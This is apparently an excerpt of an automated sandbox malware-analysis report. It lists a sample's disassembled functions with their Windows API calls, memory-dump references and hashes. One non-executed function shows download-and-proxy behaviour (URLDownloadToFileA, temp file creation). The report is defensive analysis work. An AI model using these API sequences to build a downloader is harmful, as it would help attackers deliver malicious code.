                                                                                  • Opcode Fuzzy Hash: 5f85c7bd0e2b06d2dcd447206a911433d14e56062852781c3ed8f1b87946df93
                                                                                  • Instruction Fuzzy Hash: E5F065717183419EDB302F70BC457BA3A94DB60795F12843BF404C81D5EF6CD981A52A
                                                                                  Function 0049D390 Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,00000000,0049F319,00000318), ref: 0049D397
                                                                                  • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,08000080,00000000), ref: 0049D3C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileValue
                                                                                  • String ID:
                                                                                  • API String ID: 3000843052-0
                                                                                  • Opcode ID: 67d416e1a07b03122cc92354712e76691c6601da34141375a080b3cb754bc8d9
                                                                                  • Instruction ID: dc1f9dcab5cc13101ea670c0f268a5cad9757dc8d0d3b17dd442b0a026beffae
                                                                                  • Opcode Fuzzy Hash: 67d416e1a07b03122cc92354712e76691c6601da34141375a080b3cb754bc8d9
                                                                                  • Instruction Fuzzy Hash: 7DE068327507116BE230433CFC64F8A3689EB84761F21C224F620FE1C4D634DC804344
                                                                                  Function 004CAB00 Relevance: 3.0, APIs: 2, Instructions: 27threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004CAB13
                                                                                  • SetWindowsHookExA.USER32(000000FF,004CAE55,00000000,00000000), ref: 004CAB23
                                                                                    • Part of subcall function 004D490D: __EH_prolog.LIBCMT ref: 004D4912
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentH_prologHookThreadWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2183259885-0
                                                                                  • Opcode ID: af1e34c570a1da68fc2c23ceebe490edfe04ac604522e3e7e75a9dd09ef282d8
                                                                                  • Instruction ID: 37c16390faca1b4e6f10ab57e999845035e4b5278c65232c6a57163af0d49269
                                                                                  • Opcode Fuzzy Hash: af1e34c570a1da68fc2c23ceebe490edfe04ac604522e3e7e75a9dd09ef282d8
                                                                                  • Instruction Fuzzy Hash: 51F082715406946BCB607F71AC2AF193AA0AF10729F01066FF2524B2E2C76C9940CB5B
                                                                                  Function 0049FA70 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,?,0049AAFB,?,?,?,?,?,?,?,?,?,?,?,0049F866,?), ref: 0049FA79
                                                                                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000,?,0049AAFB), ref: 0049FA98
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileReadValue
                                                                                  • String ID:
                                                                                  • API String ID: 2860046521-0
                                                                                  • Opcode ID: a86b410373b842a9c788e6e6f6168c218b996033f111a17d364c24d1c2dc5772
                                                                                  • Instruction ID: 6cba04c3e874008857a5394001e16ee8edd6e0a43882ea4fc03c115469f4046c
                                                                                  • Opcode Fuzzy Hash: a86b410373b842a9c788e6e6f6168c218b996033f111a17d364c24d1c2dc5772
                                                                                  • Instruction Fuzzy Hash: 85F065726102426FDF109B64DC45F6737A8AB60B01F44857CB428CB6C1E778D808C765
                                                                                  Function 0049ACB0 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,00000000,0049DC48), ref: 0049ACB7
                                                                                  • CreateFileA.KERNELBASE(00008CFC,80000000,00000003,00000000,00000003,08000080,00000000), ref: 0049ACE6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileValue
                                                                                  • String ID:
                                                                                  • API String ID: 3000843052-0
                                                                                  • Opcode ID: 00a1aced428e33b8c9bf64ccbe972bdc7f1acf1109be55be31e8bdf0978d0b3c
                                                                                  • Instruction ID: 27020070b2c1442189f93f6e0c94d6e52f1d45ddb1cf345ba94711b8e9d3d12c
                                                                                  • Opcode Fuzzy Hash: 00a1aced428e33b8c9bf64ccbe972bdc7f1acf1109be55be31e8bdf0978d0b3c
                                                                                  • Instruction Fuzzy Hash: EEE026315407216BE6305738BC55F863B54AB00760F110629FA60BE2C0CA70A4008788
                                                                                  Function 0049D3E0 Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,00000000,0049F621), ref: 0049D3E7
                                                                                  • CloseHandle.KERNELBASE(?), ref: 0049D406
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleValue
                                                                                  • String ID:
                                                                                  • API String ID: 492146193-0
                                                                                  • Opcode ID: 7877989533cbc5b3fa0ca31bcce4eb95413f61b597e9fef56e943b8bf0eb3b06
                                                                                  • Instruction ID: d1a193ab2e20c27520ec538e5f75e507fab189a90da301cc98243f80321b70b1
                                                                                  • Opcode Fuzzy Hash: 7877989533cbc5b3fa0ca31bcce4eb95413f61b597e9fef56e943b8bf0eb3b06
                                                                                  • Instruction Fuzzy Hash: 8EE086318056218BEA30977CB85894B3B54FB12370B124B71F975DA2D5CB34DC414798
                                                                                  Function 004AF1DF Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 004AF2C6
                                                                                    • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                    • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                  • String ID:
                                                                                  • API String ID: 1616793339-0
                                                                                  • Opcode ID: 63d995920bffc18b8655c62a2c9cd831f0378f043e6a859faf703b69fd73fe18
                                                                                  • Instruction ID: ab4fcb4c8e1cda79f0ba90a68ed9fddfe8ff0e90b15d5c4c9b2376d01146c16c
                                                                                  • Opcode Fuzzy Hash: 63d995920bffc18b8655c62a2c9cd831f0378f043e6a859faf703b69fd73fe18
                                                                                  • Instruction Fuzzy Hash: C6212037900205ABDB10EFE5DC427DEB7A4EB22724F10417BF810EB2C1C77D99469A58
                                                                                  Function 004AF0B8 Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,?,00000000,00000010,?,?,004AF278,00000009,?), ref: 004AF18C
                                                                                    • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                    • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterFreeHeapInitialize
                                                                                  • String ID:
                                                                                  • API String ID: 641406236-0
                                                                                  • Opcode ID: bfdd59fe5a4daddcc2dbb38de88b9a3c59e0017f3438715b496d68fe2641e53d
                                                                                  • Instruction ID: 5cc222f878d1b992edefbc0fe392e140553f88e957d0e6a3cdc02316fc8d294b
                                                                                  • Opcode Fuzzy Hash: bfdd59fe5a4daddcc2dbb38de88b9a3c59e0017f3438715b496d68fe2641e53d
                                                                                  • Instruction Fuzzy Hash: F721C572905204EADF21ABD5DC42BEE7778EF16324F24013BF414B51D1DB7C8D458AA9
                                                                                  Function 00479182 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004791DF
                                                                                    • Part of subcall function 004D3DE1: __EH_prolog.LIBCMT ref: 004D3DE6
                                                                                    • Part of subcall function 004D3DE1: GetCurrentThread.KERNEL32 ref: 004D3E34
                                                                                    • Part of subcall function 004D3DE1: GetCurrentThreadId.KERNEL32 ref: 004D3E3D
                                                                                    • Part of subcall function 0046D587: __EH_prolog.LIBCMT ref: 0046D58C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$CurrentThread
                                                                                  • String ID:
                                                                                  • API String ID: 37307217-0
                                                                                  • Opcode ID: 2a767b3fe69302af24082e9137333bbbd63bd72c26ef9c53f36f48fbf1872cc2
                                                                                  • Instruction ID: c67c4a3b7966bb7f2428f3be3b3cbc3944b491864373d79ba5959cf9ed090ea2
                                                                                  • Opcode Fuzzy Hash: 2a767b3fe69302af24082e9137333bbbd63bd72c26ef9c53f36f48fbf1872cc2
                                                                                  • Instruction Fuzzy Hash: 00E04F71E101609BD715DF45C4167ADB6B4FB01709F00456FA55267680DBB85E00879A
                                                                                  Function 004C9C87 Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadStringA.USER32(?,?,?,?), ref: 004C9C9E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString
                                                                                  • String ID:
                                                                                  • API String ID: 2948472770-0
                                                                                  • Opcode ID: 0c0e5a301bfefe032e674e7a95a1f583e608efff8566e35ab39e29ea695d7c11
                                                                                  • Instruction ID: 4406e836ed60d0a265fc58f86d2ca5a4f19eb9a8ee7eb16a50e4321254071119
                                                                                  • Opcode Fuzzy Hash: 0c0e5a301bfefe032e674e7a95a1f583e608efff8566e35ab39e29ea695d7c11
                                                                                  • Instruction Fuzzy Hash: B3D0A7B64083A1ABCB01DF509808D4FBBE4BF65310F058C1EF49043211C324C804C766
                                                                                  Function 0049AF10 Relevance: 1.4, APIs: 1, Instructions: 126COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,00000318,00000000,00000000,0049DCC4,?), ref: 0049AF19
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: 7c48532714199b99f88cb2d6722789347f906474db233065fa66e4fd602f10d7
                                                                                  • Instruction ID: 7bbf17f8638fa34963296a8da90bb3ca29cc3c8c013688301d4745ba2267ddc5
                                                                                  • Opcode Fuzzy Hash: 7c48532714199b99f88cb2d6722789347f906474db233065fa66e4fd602f10d7
                                                                                  • Instruction Fuzzy Hash: 0F4162F1A01B009BEA20DF769841997FBE5FB90314F144C3FE56E87302EB35A8058B96

                                                                                  Non-executed Functions

                                                                                  Function 0041C471 Relevance: 49.3, APIs: 18, Strings: 10, Instructions: 341libraryloaderfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0041C476
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0041C52F
                                                                                  • GetTempFileNameA.KERNEL32(?,IRWIN,00000000,?), ref: 0041C549
                                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0041C55B
                                                                                  • DeleteFileA.KERNEL32(?), ref: 0041C568
                                                                                  • LoadLibraryA.KERNEL32(wininet.dll), ref: 0041C62B
                                                                                  • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 0041C63E
                                                                                  • GetProcAddress.KERNEL32(?,DetectAutoProxyUrl), ref: 0041C69E
                                                                                  • GlobalFree.KERNEL32(?), ref: 0041C6C9
                                                                                  • GlobalFree.KERNEL32(?), ref: 0041C6D7
                                                                                  • GlobalFree.KERNEL32(?), ref: 0041C6E5
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0041C6EE
                                                                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0041C70E
                                                                                  • LoadLibraryA.KERNEL32(jsproxy.dll), ref: 0041C720
                                                                                  • GetProcAddress.KERNEL32(00000000,InternetInitializeAutoProxyDll), ref: 0041C733
                                                                                  • GetProcAddress.KERNEL32(?,InternetGetProxyInfo), ref: 0041C7F3
                                                                                  • GetProcAddress.KERNEL32(?,InternetDeInitializeAutoProxyDll), ref: 0041C851
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0041C88C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeProc$FileLibrary$Global$LoadTemp$AttributesDeleteDownloadH_prologIncrementInterlockedNamePathlstrlen
                                                                                  • String ID: %s; DIRECT$0:R$DetectAutoProxyUrl$IRWIN$InternetDeInitializeAutoProxyDll$InternetGetProxyInfo$InternetInitializeAutoProxyDll$InternetQueryOptionA$jsproxy.dll$wininet.dll
                                                                                  • API String ID: 989166556-3321067483
                                                                                  • Opcode ID: efe7fcad68390f728cb24e32e576bbca83cb88dfdf2b8267f6d9fb835b04bd5a
                                                                                  • Instruction ID: ef1c6708a2ff59c9dad073d53bd849c5176ff981abfff4362f351de8a9fad1b9
                                                                                  • Opcode Fuzzy Hash: efe7fcad68390f728cb24e32e576bbca83cb88dfdf2b8267f6d9fb835b04bd5a
                                                                                  • Instruction Fuzzy Hash: D5D15D71C4025DEEDB11EBA4CD85FEEBBB8AF18304F1040AEE505B2191D7785A89CF69
                                                                                  Function 004D4165 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 99libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(CTL3D32.DLL,004D32FB,?,00000000,00479292,00523A30), ref: 004D4198
                                                                                  • GetProcAddress.KERNEL32(00000000,0000000C), ref: 004D41AF
                                                                                  • GetProcAddress.KERNEL32(?,0000000D), ref: 004D41B9
                                                                                  • GetProcAddress.KERNEL32(?,00000010), ref: 004D41C3
                                                                                  • GetProcAddress.KERNEL32(?,00000018), ref: 004D41CD
                                                                                  • GetProcAddress.KERNEL32(?,00000006), ref: 004D41D7
                                                                                  • GetProcAddress.KERNEL32(?,00000015), ref: 004D41E1
                                                                                  • GetProcAddress.KERNEL32(?,00000016), ref: 004D41EB
                                                                                  • GetProcAddress.KERNEL32(?,00000003), ref: 004D41F5
                                                                                  • GetProcAddress.KERNEL32(?,00000019), ref: 004D41FF
                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00479292,00523A30), ref: 004D4250
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                  • String ID: CTL3D32.DLL
                                                                                  • API String ID: 2449869053-1520792465
                                                                                  • Opcode ID: 8a27f104601e640dba62294eb09a98eecf867229d648ab1f1f78787c4c4c02a6
                                                                                  • Instruction ID: fca0b3f50d73b38cf55783f4ca59ae31764bdc6f52519776f71bc2280243320e
                                                                                  • Opcode Fuzzy Hash: 8a27f104601e640dba62294eb09a98eecf867229d648ab1f1f78787c4c4c02a6
                                                                                  • Instruction Fuzzy Hash: 8331E7B0900B41DFD730AF62D894A27FAE0FF84745B008A7FE19A86A60D775A885DF44
                                                                                  Function 0040935F Relevance: 16.8, APIs: 11, Instructions: 306fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00409364
                                                                                    • Part of subcall function 00408CA6: __EH_prolog.LIBCMT ref: 00408CAB
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 004C613F: __EH_prolog.LIBCMT ref: 004C6144
